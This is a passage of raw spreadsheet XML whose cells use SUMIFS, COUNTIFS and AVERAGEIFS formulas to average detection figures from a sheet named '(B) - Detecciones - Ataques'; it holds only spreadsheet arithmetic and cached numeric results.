        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.2417624945</v>
      </c>
      <c r="AA149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.2307692308</v>
      </c>
      <c r="AB149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.25</v>
      </c>
      <c r="AC149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.3</v>
      </c>
      <c r="AD149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF149" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG149" s="271"/>
      <c r="AH149" s="352" t="s">
        <v>2571</v>
      </c>
      <c r="AI149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3473684211</v>
      </c>
      <c r="AR149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY149" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB149" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA149" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC149" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CP149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH149" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI149" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ149" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK149" s="271"/>
    </row>
    <row r="150">
      <c r="J150" s="277"/>
      <c r="K150" s="512"/>
      <c r="L150" s="512"/>
      <c r="M150" s="512"/>
      <c r="N150" s="512"/>
      <c r="O150" s="278"/>
      <c r="Q150" s="271"/>
      <c r="R150" s="352" t="s">
        <v>2572</v>
      </c>
      <c r="S150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1685275081</v>
      </c>
      <c r="T150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3776315789</v>
      </c>
      <c r="V150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W150" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
